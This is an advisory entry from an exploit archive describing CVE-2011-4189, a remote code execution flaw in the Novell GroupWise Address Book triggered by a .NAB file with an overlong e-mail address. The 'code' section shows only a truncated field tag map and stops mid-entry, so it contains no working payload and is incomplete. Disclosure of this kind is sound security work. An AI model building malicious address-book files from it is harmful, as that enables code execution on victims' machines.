Novell Groupwise Address Book Remote Code Execution Exploit

Summary

Novell groupwise address book suffers from remote code execution vulnerability.

Credit:

The information has been provided by Francis Provencher.


Details

Vulnerable Systems:
 * Novell Groupwise Address Book

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installation of Novell Groupwise Client. User must open a malformed Novell Address Book (*.NAB) with an overly long email address to trigger this vulnerability.

The Code
:::TAGMAP:::0FFE0003:***,3001001F:Name,3A06001F:First Name,3A44001F:Middle Name,3A11001F:Last Name,3A45001F:Prefix,3A05001F:Suffix,3003001F:E-Mail Address,3A56101F:E-Mail Addresses,3A00001F:User ID,6605001F:Post Office,6604001F:Domain,660D001F:Internet Domain,6609001F:Additional Routing,660C0003:E-Mail Address Format,6603001F:GUID,66060003:File ID,6608001F:Network ID,6607001F:eDirectory Distinguished Name,3004001F:Comments,660E001F:AIM/IM Screen Name,6610101F:IM Addresses,3A1A001F:Phone Number,3A08001F:Office Phone,3A09001F:Home Phone,3A1C001F:Mobile Phone,3A23001F:Fax Number,3A21001F:Pager Number,3A29001F:Office Street,3A19001F:Mailstop,3A27001F:Office City,3A28001F:Office State,3A2A001F:Office Postal Code,3A260000:Office Country,3A5D001F:Home Street,3A59001F:Home City,3A5C001F:Home State,3A5B001F:Home Postal Code,3A5A001F:Home Country,3A17001F:Title,3A18001F:Department,3A16001F:Organization,3A51001F:Office Website,3A50001F:Personal Website,3A42001F:Birthday,661

CVE Information:
2011-4189

Disclosure Timeline:
2011-11-30 Vulnerability reported to vendor
2012-02-29 Vendor disclose patch

Categories: Exploits